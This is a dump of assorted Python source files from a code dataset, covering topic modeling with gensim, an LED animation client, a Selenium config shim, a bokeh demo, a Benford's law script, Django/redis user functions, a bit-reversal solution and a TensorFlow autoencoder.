#\n for i in range(len(nx)):\n if downsig != None and upsig == None:\n # high-pass filter\n condiz = (nx[i] >= numpy.subtract(wa,numpy.multiply(ws,downsig)))\n elif downsig == None and upsig != None:\n # low-pass filter\n condiz = (nx[i] <= numpy.add(wa,numpy.multiply(ws,upsig)))\n else:\n # sigma-clipping\n condiz = (numpy.logical_and((nx[i] >= numpy.subtract(wa,numpy.multiply(ws,downsig))),(nx[i] <= numpy.add(wa,numpy.multiply(ws,upsig)))))\n #\n resi = CondVar (numx,nx[i],waclp,condiz,nit)\n #\n numx = resi[0]\n nit = resi[1] \n #\n wasclp = numpy.where(nit>1, numpy.divide(numx,nit-1), numpy.zeros(nx[0].shape))\n # std and sterr\n wsclp = numpy.sqrt(wasclp)\n weclp = numpy.where(nit>1, numpy.divide(wsclp,numpy.sqrt(nit)), numpy.zeros(nx[0].shape))\n #\n return waclp,wexpclp,wsclp,weclp\n\n\n","sub_path":"Misc/SRPStatistics/AverSigmaClippFrame.py","file_name":"AverSigmaClippFrame.py","file_ext":"py","file_size_in_byte":3517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"289136708","text":"import pandas as pd\nimport numpy as np\n\n# Gensim\nimport gensim\nfrom gensim import models\nimport gensim.corpora as corpora\nfrom gensim.models import CoherenceModel\n\n\nclass PipelineTopicModeling:\n \n def __init__(self, text_data, n_gram_set = 2, corpus_type = 'bow', model_list = ['lda'], number_of_topics = None ):\n '''\n text_data: list of strings (doc) of target documents \n n_gram_set: 1 - unigram; 2 - bigram; 3 - trigram \n corpus_type: 'bow' or 'tfidf' \n model-list: 'lda','lda_mallet'\n number of topics: \n - int: \n - list(range())\n\n\n\n '''\n\n self.string_corpus = text_data\n self.token_corpus = [i.split() for i in self.string_corpus.tolist()]\n\n self.id2word = corpora.Dictionary(self.token_corpus)\n\n self.n_gram = n_gram_set\n self.corpus_type = corpus_type\n self.model_dict = None\n \n self.token_corpus_ngram = n_gram_builder(self.token_corpus,n_gram = self.n_gram)\n\n self.freq_corpus = frequency_corpus_builder(self.token_corpus_ngram, self.id2word, self.corpus_type)\n\n\n # Evaluation \n self.topn_terms = topn_terms\n\n \n\n # def plot_results():\n\n\n\n\n\n def tuning_result(self, model, topic_number, coherence_metric = 'c_v', topn_terms = 30,topn_saved = 10):\n \n topic_list = model2topics (model, topn_terms = topn_terms)\n topic_list_saved = [','.join(i[:topn_saved]) for i in topic_list]\n topic_list_saved.append(None)\n\n\n\n coherence_score_list = within_topic_coherence (topic_list, \n list_of_lists_tokens = self.token_corpus_ngram, \n corpus = self.freq_corpus,\n id2word = self.id2word, \n topn_terms = topn_terms, \n coherence_metric = 'c_v')\n\n distance_score_list = between_topic_distance(model, distance_metric = 'cosine')\n\n return pd.dataFrame([coherence_score_list,distance_score_list,topic_list_saved])\n\n \n\n\n\n\n\n\n\n\n\n\n\n\n# n-gram builder - list of tokens \ndef n_gram_builder (list_of_lists_tokens, min_count=5, threshold=100, n_gram = 2):\n '''\n this function detetct potential phrases (e.g. bigram and trigram) in the token list \n Input: a list of list of natural tokens (split by white space)\n return: a list of lists with n-gram tokens \n '''\n if n_gram == 1:\n return list_of_lists_tokens\n else:\n # Build the bigram and trigram models\n bigram = gensim.models.Phrases(list_of_lists, min_count=min_count, threshold=threshold) # higher threshold fewer phrases. \n # Faster way to get a sentence clubbed as a trigram/bigram\n bigram_mod = gensim.models.phrases.Phraser(bigram)\n \n if n_gram == 3:\n trigram = gensim.models.Phrases(bigram[list_of_lists], threshold=threshold) \n trigram_mod = gensim.models.phrases.Phraser(trigram)\n return [trigram_mod[bigram_mod[doc]] for doc in list_of_lists_tokens]\n elif n_gram == 2:\n return [bigram_mod[doc] for doc in list_of_lists_tokens]\n else:\n print('N-GRAM SETTING IS INALID. PLEASE RESET IT TO 1, 2 OR 3!')\n\n\n# vector features \ndef frequency_corpus_builder(list_of_lists_tokens, id2word, freq_type = 'bow'):\n bow_corpus = [id2word.doc2bow(list_of_lists_tokens) for text in list_of_lists_tokens]\n\n if freq_type == 'tfidf':\n tfidf_model = models.TfidfModel(bow_corpus)\n tfidf_corpus = tfidf_model[corpus]\n return tfidf_corpus\n else:\n return bow_corpus\n\n\n# models\n# Build LDA model\n\ndef tm_mdoels (corpus, id2word, number_of_topics, model_selection, model_name = 'lda'):\n\n if mdoel_name == 'lda':\n\n model = models.ldamodel.LdaModel(corpus = corpus,\n id2word=id2word,\n num_topics=number_of_topics, \n random_state=100,\n update_every=1,\n chunksize=100,\n passes=10,\n alpha='auto',\n per_word_topics=False)\n\n elif model_name == 'lsi':\n\n model = models.LsiModel(corpus = corpus,\n id2word =id2word,\n num_topics = number_of_topics)\n\n else:\n\n print('MODEL NAME CANNOT BE RECOGNISED!')\n\n\n return model\n\n\ndef model2topics (model, topn_terms = 30):\n list_of_topics = []\n for i in list(range(5)):\n topic_terms = []\n for term, score in model.show_topic(i, topn = topn_terms):\n topic_terms.append(term)\n list_of_topics.append(topic_terms)\n return list_of_topics\n\n\n# model evaluation \n\n\n\ndef within_topic_coherence (topics, list_of_lists_tokens, corpus, id2word, topn_terms = 30, coherence_metric = 'c_v'):\n '''\n For ‘c_v’, ‘c_uci’ and ‘c_npmi’ texts should be provided (corpus isn’t needed); \n For ‘u_mass’ corpus should be provided\n\n topn_terms: default of coherence model is 20\n\n return: a list of coherence score, each topic will get a coherence score, the last one is model score\n\n '''\n coherence_model = models.CoherenceModel(topics = topics, \n texts = list_of_lists_tokens, \n corpus = corpus,\n dictionary = id2word, \n coherence = coherence_metric,\n topn = topn_terms\n\n )\n model_coherence = coherence_model.get_coherence()\n topic_coherence = coherence_model.get_coherence_per_topic(segmented_topics=None, with_std=False, with_support=False)\n return topic_coherence.append(model_coherence)\n \n\n\n\n\ndef between_topic_distance(model, distance_metric = 'cosine'):\n topic_term_matrix = model.get_topics()\n dist_out = 1-pairwise_distances(topic_term_matrix, metric = distance_metric)\n model_distance = (sum(np.unique(dist_out)) -1)/len(np.unique(dist_out))\n np.fill_diagonal(dist_out, 0)\n topic_distance = list(dist_out.max(axis = 0))\n return topic_distance.append(model_distance)\n\n\n\n\n\n\n","sub_path":"topic_modelling_package/.ipynb_checkpoints/TM_functions-checkpoint.py","file_name":"TM_functions-checkpoint.py","file_ext":"py","file_size_in_byte":6535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"627318473","text":"import opc\nimport time\nimport random\n#client = opc.Client('192.168.1.99:7890')\nclient = opc.Client('localhost:7890')\ncolors=[(204,0,204)]\nfps=1\nfill=.25\n\ndef distort(c):\n mod = [0,0,0]\n d = random.random() - .5\n mod[0] = max(c[0] + 123*d,0)\n d = random.random() - .5\n mod[1] = max(c[1] + 123*d,0)\n d = random.random() - .5\n mod[2] = max(c[2] + 123*d,0)\n modtuple = (mod[0],mod[1],mod[2])\n return modtuple\n\ndef color(rgb):\n i = 0\n while i < (13*67):\n d = random.random()\n if d < fill:\n x.append (distort(rgb))\n else:\n x.append((0,0,0))\n i = i +1 \n\ndef colorwave(rgb,j):\n i = 0\n while i < (13*67):\n if j==0:\n x.append((255,0,0))\n else:\n d = random.random()\n if d < fill:\n x.append (distort(rgb))\n else:\n x.append((0,0,0))\n i = i +1 \n if i%13 == 0:\n j = j + 1\n if j > 5:\n j=1\n\ndef colorSwitcher(colors,switch,j):\n colorwave(colors[switch],j)\n\nswitch = 0 \ncount = 0\n\ncap = len(colors)\nj = 0\nwhile True:\n j = j + 1\n x=[]\n count = count + 1\n switch = (switch + 1) % cap\n colorSwitcher(colors,switch, j%13)\n client.put_pixels(x, channel=0)\n time.sleep(1/fps)\n","sub_path":"python_clients/wave.py","file_name":"wave.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"653228587","text":"# MIT License\n#\n# Copyright (c) 2015-2021 Iakiv Kramarenko\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\nimport warnings\n\nfrom selene.support.shared import config\n\n\nclass OldConfig:\n @property\n def timeout(self):\n warnings.warn(\n 'selene.config.timeout is deprecated, '\n 'use `from selene.support.shared import config` import',\n DeprecationWarning,\n )\n return config.timeout\n\n @timeout.setter\n def timeout(self, value):\n warnings.warn(\n 'selene.config.timeout is deprecated, '\n 'use `from selene.support.shared import config` import',\n DeprecationWarning,\n )\n config.timeout = value\n\n @property\n def poll_during_waits(self):\n warnings.warn(\n 'selene.config.poll_during_waits is deprecated, '\n 'use `from selene.support.shared import config` import',\n DeprecationWarning,\n )\n return config.poll_during_waits\n\n @poll_during_waits.setter\n def poll_during_waits(self, value):\n warnings.warn(\n 'selene.config.poll_during_waits is deprecated, '\n 'use `from selene.support.shared import config` import',\n DeprecationWarning,\n )\n config.poll_during_waits = value\n\n @property\n def base_url(self):\n warnings.warn(\n 'selene.config.base_url is deprecated, '\n 'use `from selene.support.shared import config` import',\n DeprecationWarning,\n )\n return config.base_url\n\n @base_url.setter\n def base_url(self, value):\n warnings.warn(\n 'selene.config.base_url is deprecated, '\n 'use `from selene.support.shared import config` import',\n DeprecationWarning,\n )\n config.base_url = value\n\n @property\n def app_host(self):\n warnings.warn(\n 'selene.config.app_host is deprecated, '\n 'use `from selene.support.shared import config` import',\n DeprecationWarning,\n )\n return config.base_url\n\n @app_host.setter\n def app_host(self, value):\n warnings.warn(\n 'selene.config.app_host is deprecated, '\n 'use `from selene.support.shared import config` import',\n DeprecationWarning,\n )\n config.base_url = value\n\n @property\n def cash_elements(self):\n warnings.warn(\n 'selene.config.cash_elements is deprecated, '\n 'use `from selene.support.shared import config` import',\n DeprecationWarning,\n )\n return config.cash_elements\n\n @cash_elements.setter\n def cash_elements(self, value):\n warnings.warn(\n 'selene.config.cash_elements is deprecated, '\n 'use `from selene.support.shared import config` import',\n DeprecationWarning,\n )\n config.cash_elements = value\n\n @property\n def browser_name(self):\n warnings.warn(\n 'selene.config.browser_name is deprecated, '\n 'use `from selene.support.shared import config` import',\n DeprecationWarning,\n )\n return config.browser_name\n\n @browser_name.setter\n def browser_name(self, value):\n warnings.warn(\n 'selene.config.browser_name is deprecated, '\n 'use `from selene.support.shared import config` import',\n DeprecationWarning,\n )\n config.browser_name = value\n\n @property\n def start_maximized(self):\n warnings.warn(\n 'selene.config.start_maximized is deprecated, '\n 'use `from selene.support.shared import config` import',\n DeprecationWarning,\n )\n return config.start_maximized\n\n @start_maximized.setter\n def start_maximized(self, value):\n warnings.warn(\n 'selene.config.start_maximized is deprecated, '\n 'use `from selene.support.shared import config` import',\n DeprecationWarning,\n )\n config.start_maximized = value\n\n @property\n def hold_browser_open(self):\n warnings.warn(\n 'selene.config.hold_browser_open is deprecated, '\n 'use `from selene.support.shared import config` import',\n DeprecationWarning,\n )\n return config.hold_browser_open\n\n @hold_browser_open.setter\n def hold_browser_open(self, value):\n warnings.warn(\n 'selene.config.hold_browser_open is deprecated, '\n 'use `from selene.support.shared import config` import',\n DeprecationWarning,\n )\n config.hold_browser_open = value\n\n @property\n def counter(self):\n warnings.warn(\n 'selene.config.counter is deprecated, '\n 'use `from selene.support.shared import config` import',\n DeprecationWarning,\n )\n return config.counter\n\n @counter.setter\n def counter(self, value):\n warnings.warn(\n 'selene.config.counter is deprecated, '\n 'use `from selene.support.shared import config` import',\n DeprecationWarning,\n )\n config.counter = value\n\n @property\n def reports_folder(self):\n warnings.warn(\n 'selene.config.reports_folder is deprecated, '\n 'use `from selene.support.shared import config` import',\n DeprecationWarning,\n )\n return config.reports_folder\n\n @reports_folder.setter\n def reports_folder(self, value):\n warnings.warn(\n 'selene.config.reports_folder is deprecated, '\n 'use `from selene.support.shared import config` import',\n DeprecationWarning,\n )\n config.reports_folder = value\n\n @property\n def desired_capabilities(self):\n warnings.warn(\n 'selene.config.desired_capabilities is deprecated, '\n 'use `from selene.support.shared import config` import',\n DeprecationWarning,\n )\n return config.desired_capabilities\n\n @desired_capabilities.setter\n def desired_capabilities(self, value):\n warnings.warn(\n 'selene.config.desired_capabilities is deprecated, '\n 'use `from selene.support.shared import config` import',\n DeprecationWarning,\n )\n config.desired_capabilities = value\n","sub_path":"selene/support/shared/deprecated.py","file_name":"deprecated.py","file_ext":"py","file_size_in_byte":7361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"178259366","text":"from concurrent.futures import ThreadPoolExecutor\n\nfrom bokeh.models import ColumnDataSource, HoverTool\nfrom bokeh.plotting import curdoc, figure\nfrom bokeh.models.widgets import Slider, Toggle\nfrom bokeh.layouts import row, widgetbox\nfrom bokeh.layouts import gridplot\n\n# create basic data\ndoc = curdoc()\nexecutor = ThreadPoolExecutor(max_workers=2)\nsource = ColumnDataSource(data=dict(x=[0], y=[0], color=[\"blue\"]))\n\n# instatiate interactive elements\nnum_points_slider = Slider(title=\"offset\", value=1, start=1, end=10, step=1)\nstep_slider = Slider(title=\"step\", value=5, start=1, end=10, step=1)\nstart_stop = Toggle(label=\"Start/Stop\", button_type=\"default\")\n\n# create inputs column\ninputs = widgetbox(num_points_slider, step_slider, start_stop, width=100)\n\n# decide tools to be used\ntools = \"pan,wheel_zoom,box_zoom,reset,save,crosshair\" # crosshair\nhover = HoverTool(\n tooltips=[\n (\"index\", \"$index\"),\n (\"(x,y)\", \"($x, $y)\")\n ]\n )\n\n# prepare figure\np0 = figure(x_range=[0, 100], y_range=[0, 20], tools=[tools, hover], plot_width=600)\nl0 = p0.circle(x='x', y='y', color='color', source=source)\n\n# add plots\np = gridplot([[p0]], toolbar_location='below') # above, below left right\n\n# add plots to document\ndoc.add_root(row(inputs, p))\n","sub_path":"bokeh_interactive_01.py","file_name":"bokeh_interactive_01.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"86286619","text":"import random\n\n# Use chosen method for creating list, finding the first digit and printing the results\n\n\ndef fullSequence(calcMethod, listLength):\n if calcMethod == 1:\n createRandIntList(listLength)\n elif calcMethod == 2:\n createDoubles(listLength)\n elif calcMethod == 3:\n createFibonacci(listLength)\n else:\n createSquaredList(listLength)\n\n findFirstDigit()\n calculateTotals()\n print(\"Total of each beginning digit and their % of total: \")\n printTotals()\n\n# Methods for creating different lists\n\n\ndef createRandIntList(listLength): # List of random integers\n listLength = int(listLength)\n for i in range(listLength):\n r = random.randint(1, listLength)\n li.append(r)\n\n\ndef createDoubles(listLength): # List of constantly doubling numbers\n listLength = int(listLength)\n f1 = 1\n for i in range(listLength):\n li.append(f1)\n f1 = f1 * 2\n\n\ndef createFibonacci(listLength): # Fibonacci sequence\n listLength = int(listLength)\n a, b = 0, 1\n for i in range(listLength):\n a, b = b, a + b\n li.append(a)\n return a\n\n\ndef createSquaredList(listLength): # List of squared numbers (1, 2, 4, 16, 256... n)\n listLength = int(listLength)\n a = 1\n for i in range(listLength):\n li.append(a)\n a = a * a\n if a == 1:\n a = a + 1\n\n# Go through list and remove all digits except for the first in every number in list li\ndef findFirstDigit():\n for i in li:\n while i >= 10:\n i = i / 10\n first_digit_list.append(i)\n\n# Calculate totals of every starting digit\ndef calculateTotals():\n for i in first_digit_list:\n i = int(i)\n final_list[i - 1] = final_list[i - 1] + 1\n\n# Print the total amount of every starting digit\ndef printTotals():\n int = 1\n total = 0\n\n for i in final_list:\n total = i + total\n\n for i in final_list:\n p = float(i * 100.0 / total)\n if i < 10:\n print(int, \": \", i, \" ....\", p, \"%\")\n if i >= 10:\n print(int, \": \", i, \"....\", p, \"%\")\n int += 1\n print(\"==========\\n\")\n\n# Reset lists to get ready for creating and parsing a new list.\ndef resetLists():\n global li\n global first_digit_list\n global final_list\n global listLength\n\n li = []\n first_digit_list = []\n final_list = [0, 0, 0, 0, 0, 0, 0, 0, 0]\n\n# Create the gui\ndef gui():\n while True:\n resetLists()\n i = input(\"1 : Random String of integers\\n2 : List of doubling numbers\\n3 : Fibonacci Sequence\\n4 : List of squared numbers\\n5 : Exit\\n\\n : \")\n i = int(i)\n if i == 1: # 1 : Random String of integers\n calcMethod = i\n listLength = input(\"\\nHow long do you want the list to be?\\n\\n :\")\n fullSequence(calcMethod, listLength)\n if i == 2: # 2 : List of doubling numbers\n calcMethod = i\n listLength = input(\n \"\\nHow long do you want the list to be? [min: 1 - max: 1028]\\n\\n :\")\n fullSequence(calcMethod, listLength)\n if i == 3: # 3 : Fibonacci Sequence\n calcMethod = i\n listLength = input(\n \"\\nHow long do you want the list to be? [min: 1 - max: 1481]\\n\\n :\")\n fullSequence(calcMethod, listLength)\n if i == 4: # 4 : List of squared numbers\n calcMethod = i\n listLength = input(\n \"\\nHow long do you want the list to be? [min: 1 - max: 12]\\n\\n :\")\n fullSequence(calcMethod, listLength)\n if i == 5: # 5 : Exit\n quit()\n if i not in range(1, 6):\n print(\"\\nInvalid option. Please try again... I believe in you\\n\")\n\n\ndef runScript():\n while True:\n gui()\n\n\nif __name__ == '__main__':\n runScript()\n","sub_path":"benfordTest.py","file_name":"benfordTest.py","file_ext":"py","file_size_in_byte":3484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"317610724","text":"from django.contrib.auth.models import User\nfrom webapp.models import LcUser,Comment\nfrom django.db import connection\nfrom time import time\nfrom django.contrib import auth\nimport traceback\nimport os\nimport redis\nfrom django.db.models import F\n\ndef follow_thread(uid,tid):\n try:\n r = redis.Redis()\n r.sadd('uflw:'+str(uid),str(tid))\n r.sadd('tflw:'+str(tid),str(uid))\n return True\n except:\n return False\n\ndef unfollow_thread(uid,tid):\n try:\n r = redis.Redis()\n r.srem('uflw:'+str(uid),str(tid))\n r.srem('tflw:'+str(tid),str(uid))\n return True\n except:\n return False\n\ndef is_following(uid,tid):\n try:\n r = redis.Redis()\n if r.sismember('uflw:'+str(uid),str(tid)):\n return 1\n return 0\n except:\n return 0\n\ndef get_follows(uid):\n try:\n r = redis.Redis()\n tids = r.smembers('uflw:'+str(uid))\n return [int(tid) for tid in tids]\n except:\n return []\n\ndef get_followers(tid):\n try:\n r = redis.Redis()\n uids = r.smembers('tflw:'+str(tid))\n return [int(uid) for uid in uids]\n except:\n return []\n\ndef get_user_id(username):\n try:\n return LcUser.objects.filter(user__username = username)[0].id\n except:\n return -1\n\ndef get_user_name(uid):\n try:\n return LcUser.objects.filter(id = int(uid))[0].user.username\n except:\n return ''\n\ndef notify(uid,cid,reply):\n \"\"\"\n notify user about a reply to his-her comment from another user\n \"\"\"\n try:\n r = redis.Redis()\n if reply:\n r.zadd('not:'+str(uid),str(cid),int(time()))\n else:\n r.zadd('not:'+str(uid),str(cid),0)\n except:\n return None # fail silent - not a big deal\n\ndef get_notifs(uid):\n try:\n r = redis.Redis()\n notifs = r.zrange('not:'+str(uid),0,-1,withscores=True)\n return notifs\n except:\n return []\n\ndef del_notif(uid,cid):\n try:\n r = redis.Redis()\n r.zrem('not:'+str(uid),str(cid))\n except:\n return None\n\ndef did_vote(uid,cids):\n \"\"\"\n returns -1,0,1 for downvote,notvoted,upvote for given u(ser)id and c(omment)ids\n \"\"\"\n try:\n r = redis.Redis()\n votes = r.hmget('v:'+str(uid),[str(cid) for cid in cids])\n out = []\n for vote in votes:\n if vote == None:\n out.append(0)\n else:\n out.append(int(vote))\n return (True,out)\n except:\n return (False,str(traceback.format_exc()))\n \ndef vote(uid,cid,vote):\n \"\"\"\n add user vote (! changes both redis and postgres !)\n \"\"\"\n try:\n r = redis.Redis()\n v = r.hget('v:'+str(uid),str(cid))\n if v == None:\n v = 0\n else:\n v = int(v)\n if v == vote:\n return (True,'') # no need to change - same vote - should never be possible\n r.hset('v:'+str(uid),str(cid),vote)\n \n c = Comment.objects.get(pk = int(cid))\n t = c.thread\n \n if c.creator.id != int(uid):\n\n if v == 1:\n c.up = c.up - 1\n t.up = t.up - 1\n elif v == -1:\n c.down = c.down - 1\n t.down = t.down - 1\n if vote == 1:\n c.up = c.up + 1\n t.up = t.up + 1\n elif vote == -1:\n c.down = c.down +1\n t.down = t.down +1\n\n c.save()\n t.save()\n\n return (True,'')\n except:\n connection._rollback()\n return (False,str(traceback.format_exc()))\n\ndef login(request,username,password):\n try:\n user = auth.authenticate(username=username, password=password)\n if user is not None and user.is_active:\n auth.login(request, user);\n # bring up associated lc-user object\n lcuser = LcUser.objects.get(user = user)\n request.session['uid'] = lcuser.id\n return (True,'')\n return (False,'')\n except:\n connection._rollback()\n return (False,str(traceback.format_exc()))\n\ndef generateId():\n return int(os.urandom(4).encode('hex'),16) / 2\n\ndef register(request,username,password,email=None):\n try:\n user = User.objects.create_user(username = username, password = password, email = email)\n user.is_staff = False\n user.save()\n # create a blank lc user and associate with user object\n lcuser = LcUser(id=generateId(),user = user, time_joined = int(time()), join_ip = request.META['REMOTE_ADDR'])\n lcuser.save()\n user = auth.authenticate(username=username, password=password)\n auth.login(request, user);\n request.session['uid'] = lcuser.id\n return (True,lcuser.id)\n except:\n connection._rollback()\n return (False,str(traceback.format_exc()))\n\ndef logout(request):\n try:\n auth.logout(request)\n return (True,'')\n except:\n return (False,str(traceback.format_exc()))\n\ndef get_commented_threads(uid):\n try:\n creator = LcUser.objects.get(pk = int(uid))\n user_comments = creator.comment_set.all().order_by('-time_created')\n user_threads = []\n for c in user_comments:\n tid = c.thread.id\n user_threads = user_threads + [[tid,[c.id]]]\n # Eliminate duplicates from the thread ids\n # Merge comment IDs during the elimination \n if user_threads:\n user_threads.sort(key=lambda l: l[0])\n last = user_threads[-1]\n for i in range(len(user_threads)-2, -1, -1):\n if last[0] == user_threads[i][0]:\n last[1] = last[1] + user_threads[i][1]\n del user_threads[i]\n else:\n last = user_threads[i]\n return (True, user_threads)\n except:\n return (False,str(traceback.format_exc()),'')\n","sub_path":"lc/webapp/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":5957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"81457745","text":"#coding=utf-8\n\nimport unittest\n\n\"\"\"\n\n190. Reverse Bits\nDescriptionHintsSubmissionsDiscussSolution\nDiscuss Pick One\nReverse bits of a given 32 bits unsigned integer.\n\nFor example, given input 43261596 (represented in binary as 00000010100101000001111010011100), return 964176192 \n(represented in binary as 00111001011110000010100101000000).\n\nFollow up:\nIf this function is called many times, how would you optimize it?\n\nRelated problem: Reverse Integer\n\nCredits:\nSpecial thanks to @ts for adding this problem and creating all test cases.\n\n\nDifficulty:Easy\nTotal Accepted:113.6K\nTotal Submissions:385K\nContributor: LeetCode\nSubscribe to see which companies asked this question.\n\nRelated Topics \nBit Manipulation \nSimilar Questions \nNumber of 1 Bits \n\n\"\"\"\n\n\n\nclass Solution:\n # @param n, an integer\n # @return an integer\n def reverseBits(self, n):\n ans = 0\n for i in range(32):\n ans <<= 1\n ans |= n & 1\n n >>= 1\n return ans\n\n def reverseBits2(self, n): # from ref, actually no need to worry about -, it says unsigned integer\n \"\"\"\n s = bin(3), '0b11'\n s = bin(-3), '-0b11'\n a = \"3\".zfill(8), '00000003'\n a = \"0101\".zfill(8), '00000101'\n actually no need to worry about -, it says unsigned integer, following AC\n \n def reverseBits(self, n):\n string = bin(n)\n string = string[:2] + string[2:].zfill(32)[::-1]\n return int(string, 2)\n \n :param n: \n :return: \n \"\"\"\n string = bin(n)\n if '-' in string:\n string = string[:3] + string[3:].zfill(32)[::-1]\n else:\n string = string[:2] + string[2:].zfill(32)[::-1]\n return int(string, 2)\n\n def reverseBits_ref(self, n):\n oribin = '{0:032b}'.format(n)\n reversebin = oribin[::-1]\n return int(reversebin, 2)\n\n\nclass SolutionTester(unittest.TestCase):\n def setUp(self):\n self.sol = Solution()\n\n def test_case1(self):\n nums = 43261596\n answer = 964176192\n result = self.sol.reverseBits(nums)\n self.assertEqual(answer, result)\n\n\ndef main():\n suite = unittest.TestLoader().loadTestsFromTestCase(SolutionTester)\n unittest.TextTestRunner(verbosity=2).run(suite)\n\n\nif __name__ == \"__main__\":\n main()\n\n\n\n#-*- coding:utf-8 -*-\n\n\"\"\"\nPython代码(朴素解法):\nclass Solution:\n # @param n, an integer\n # @return an integer\n def reverseBits(self, n):\n ans = 0\n for i in range(32):\n ans <<= 1\n ans |= n & 1\n n >>= 1\n return ans\n\n优化方案:\n参考:https://oj.leetcode.com/discuss/27338/8ms-c-code-some-ideas-about-optimization-spoiler\n\n以4位为单位执行反转,将0x0至0xF的反转结果预存在一个长度为16的数组中,反转时直接查询即可。\n\nC代码:\nchar tb[16] = {0,8,4,12,2,10,6,14,1,9,5,13,3,11,7,15};\n\nuint32_t reverseBits(uint32_t n) {\n int curr = 0;\n uint32_t ret = 0;\n uint32_t msk = 0xF;\n for(int i = 0; i < 8; i++) {\n ret = ret << 4;\n curr = msk&n;\n ret |= tb[curr];\n n = n >> 4;\n }\n return ret;\n}\n\n\n\n\"\"\"","sub_path":"freq/reverse_bits.py","file_name":"reverse_bits.py","file_ext":"py","file_size_in_byte":3229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"464027632","text":"import random\nfrom dino_runner.utils.constants import (\n SCREEN_WIDTH,\n CLOUD\n)\nfrom pygame.sprite import Sprite\n\n\nclass Cloud(Sprite):\n\n def __init__(self):\n self.x = SCREEN_WIDTH + random.randint(800, 1000)\n self.y = random.randint(50, 100)\n self.image = CLOUD\n self.width = self.image.get_width()\n\n def update(self, game_speed):\n self.x -= game_speed\n if self.x < -self.width:\n self.x = SCREEN_WIDTH + random.randint(2500, 3000)\n self.y = random.randint(50, 100)\n\n def draw(self, screen):\n screen.blit(self.image, (self.x, self.y))\n\n","sub_path":"dino_runner/components/cloud.py","file_name":"cloud.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"515305337","text":"# -*- coding:utf-8\n#!/usr/bin/env python\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport tensorflow as tf\n\n#from BatchNormalization import BatchNormalization\n\nfrom IPython import embed\n\nclass Autoencoder:\n def __init__(self, ch_list=[3,32,32,16,8], k_h=5, k_w=5, stddev=0.01):\n self.ch_list = ch_list\n #define learnable parameter\n with tf.variable_scope(\"ae\"):\n #encoder\n self.w_enc1 = tf.Variable(tf.truncated_normal([28 * 28, self.ch_list[1]], stddev=stddev))\n self.b_enc1 = tf.Variable(tf.zeros([self.ch_list[1]]))\n self.w_enc2 = tf.Variable(tf.truncated_normal([self.ch_list[1], self.ch_list[2]], stddev=stddev))\n self.b_enc2 = tf.Variable(tf.zeros([self.ch_list[2]]))\n \n #decoder\n self.w_dec2 = tf.Variable(tf.truncated_normal([self.ch_list[2], self.ch_list[1]],stddev=stddev))\n self.b_dec2 = tf.Variable(tf.zeros([self.ch_list[1]]))\n self.w_dec1 = tf.Variable(tf.truncated_normal([self.ch_list[1], 28 * 28], stddev=stddev))\n self.b_dec1 = tf.Variable(tf.zeros([28 * 28]))\n\n def __call__(self, x, batch_size, train=True):\n \n #Full connection1(300)\n h_conv4 = tf.reshape(x, [-1, 1 * 28 * 28])\n inter_enc1 = tf.matmul(h_conv4, self.w_enc1) + self.b_enc1\n h_enc1 = tf.nn.tanh(inter_enc1)\n\n #Full connection2(20)\n inter_enc2 = tf.matmul(h_enc1, self.w_enc2) + self.b_enc2\n h_enc2 = tf.nn.tanh(inter_enc2)\n\n #Full connection3(300)\n inter_dec2 = tf.matmul(h_enc2, self.w_dec2) + self.b_dec2\n h_dec2 = tf.nn.tanh(inter_dec2)\n \n #Full connection4(784)\n inter_dec1 = tf.matmul(h_dec2, self.w_dec1) + self.b_dec1\n h_dec1 = tf.nn.tanh(inter_dec1)\n h_dec1 = tf.reshape(h_dec1, [-1, 28, 28, 1])\n \n return h_dec1\n \ndef conv2d(x, weight, batch_norm=None, train=True, activation=tf.nn.tanh):\n h_conv = tf.nn.conv2d(x, weight, strides=[1,2,2,1], padding=\"SAME\")\n if batch_norm != None:\n h_conv = batch_norm(h_conv, train=train)\n h_conv = activation(h_conv)\n return h_conv\n\ndef deconv2d(x, weight, output_shape, batch_norm=None, train=True, activation=tf.nn.tanh):\n h_deconv = tf.nn.conv2d_transpose(x, weight, output_shape=output_shape, strides=[1, 2, 2, 1], padding=\"SAME\")\n if batch_norm != None:\n h_deconv = batch_norm(h_deconv, train=train)\n h_deconv = activation(h_deconv)\n return h_deconv\n\n\n \n","sub_path":"vae_origin/autoencoder.py","file_name":"autoencoder.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} 